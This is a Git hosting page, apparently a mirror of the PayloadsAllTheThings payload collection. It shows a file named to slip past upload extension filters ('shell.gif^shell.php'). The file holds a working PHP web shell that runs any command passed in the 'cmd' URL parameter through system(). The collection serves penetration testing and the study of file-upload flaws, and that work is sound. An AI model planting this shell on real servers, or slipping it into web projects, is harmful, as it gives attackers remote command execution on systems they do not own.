This website requires JavaScript.
Explore
Help
Register
Sign In
wanderer
/
PayloadsAllTheThings
Watch
1
Star
0
Fork
0
You've already forked PayloadsAllTheThings
mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced
2025-08-19 18:54:50 +02:00
Code
Issues
Releases
Activity
gh-pages
PayloadsAllTheThings
/
Upload Insecure Files
/
Extension PHP
/
shell.gif^shell.php
Swk
a9f8282af8
Deployed b391de2 with MkDocs version: 1.6.1
2025-08-14 09:11:06 +00:00
2 lines
44 B
PHP
Raw
Permalink
Blame
History
<
?
php
echo
"
Shell
"
;
system
(
$_GET
[
'cmd'
]);
?>
View Git Blame
Copy Permalink